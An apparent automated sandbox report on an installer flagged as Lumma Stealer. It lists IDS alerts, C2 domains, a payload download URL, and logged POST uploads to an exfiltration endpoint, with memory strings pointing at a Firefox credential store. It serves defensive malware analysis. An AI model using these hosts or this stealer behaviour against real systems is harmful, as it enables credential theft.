Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+00000130h]	1_2_00416FE6
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [edx], cl	1_2_00416FE6
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2EB321FDh]	1_2_00416FE6
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [eax], cl	1_2_00408FF0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then push eax	1_2_0043B780
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+00000130h]	1_2_00416FAD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.4:55027 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058614 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (justyffyr .click) : 192.168.2.4:63242 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.4:61574 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.4:62830 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.4:49566 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.4:56480 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.4:50967 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.4:63726 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.4:59596 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.157.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: justyffyr.click
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: curverpluch.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: manyrestro.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: talkynicer.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cialis26.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: slipperyloo.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: justyffyr.click replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tentabatte.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: shapestickyr.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bashfulacid.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wordyfindy.lat replaycode: Name error (3)

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.157.254:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 44Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3RYI71CX57RXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18124Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ND4DV1WXTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8727Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YU1FPM536H5JQEA01QPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20440Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HPSAD4V67V4EOF1VX7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1254Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QX88Z4NZ3JMSDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570380Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: justyffyr.click
Source: global traffic	DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic	DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic	DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic	DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic	DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic	DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic	DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic	DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com
Source: global traffic	DNS traffic detected: DNS query: cialis26.us

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/e
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/es(
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/f1
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807257078.000000000115A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/file/nixsudocrypt.exe
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/file/nixsudocrypt.exe2
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/file/nixsudocrypt.exea5
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/file/nixsudocrypt.exets
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us/odedo
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cialis26.us:443/file/nixsudocrypt.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807664250.000000000149F000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807664250.00000000014C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/L
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807847132.00000000014F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807847132.00000000014F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiC:
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apir
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/apin.txtPK
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/apis92o4p.default-release/key4.dbPK
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Exlan_setup_v3.1.2.exe	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Exlan_setup_v3.1.2.exe	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 1_2_00431DF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00431DF0

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 1_2_00431DF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00431DF0

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 1_2_00431F70 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_00431F70

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFCB6B0	0_2_6CFCB6B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6D015DD2	0_2_6D015DD2
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFC2D70	0_2_6CFC2D70
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFA6650	0_2_6CFA6650
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFAA7E0	0_2_6CFAA7E0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFAC7B0	0_2_6CFAC7B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFBA0C0	0_2_6CFBA0C0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFA8B30	0_2_6CFA8B30
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_05801844	0_2_05801844
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_05800BE2	0_2_05800BE2
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_05800930	0_2_05800930
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_05804F28	0_2_05804F28
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_05804EE2	0_2_05804EE2
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_06B7DF40	0_2_06B7DF40
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_06B60006	0_2_06B60006
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_06B60040	0_2_06B60040
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043E8C0	1_2_0043E8C0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004180B2	1_2_004180B2
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00437920	1_2_00437920
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0040CADF	1_2_0040CADF
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00421AE0	1_2_00421AE0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004263B0	1_2_004263B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00415410	1_2_00415410
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0042C4C9	1_2_0042C4C9
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041FD1F	1_2_0041FD1F
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043DDE0	1_2_0043DDE0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004375B0	1_2_004375B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0042BE6F	1_2_0042BE6F
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043A600	1_2_0043A600
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041C6CF	1_2_0041C6CF
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0040A6B0	1_2_0040A6B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00423750	1_2_00423750
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0040AF1B	1_2_0040AF1B
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0040D780	1_2_0040D780
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00428859	1_2_00428859
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00437010	1_2_00437010
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041E080	1_2_0041E080
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00405940	1_2_00405940
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00438140	1_2_00438140
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00403950	1_2_00403950
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00419157	1_2_00419157
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00425960	1_2_00425960
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041E970	1_2_0041E970
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00426977	1_2_00426977
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043E100	1_2_0043E100
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00417913	1_2_00417913
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043691D	1_2_0043691D
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0042C9FA	1_2_0042C9FA
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00431980	1_2_00431980
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004061A0	1_2_004061A0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041D240	1_2_0041D240
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0042CA47	1_2_0042CA47
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00430200	1_2_00430200
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00427A28	1_2_00427A28
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0042CA38	1_2_0042CA38
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0042D239	1_2_0042D239
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004352EC	1_2_004352EC
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00419AF0	1_2_00419AF0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00428280	1_2_00428280
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043628D	1_2_0043628D
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00404300	1_2_00404300
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00420B1B	1_2_00420B1B
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0040EB30	1_2_0040EB30
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004273D0	1_2_004273D0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00431BE0	1_2_00431BE0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004293E7	1_2_004293E7
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004383A0	1_2_004383A0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00438BA7	1_2_00438BA7
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00414BA8	1_2_00414BA8
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00409440	1_2_00409440
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043E470	1_2_0043E470
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00427C00	1_2_00427C00
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00407410	1_2_00407410
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00404C30	1_2_00404C30
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043D4E0	1_2_0043D4E0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043ACF0	1_2_0043ACF0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00419480	1_2_00419480
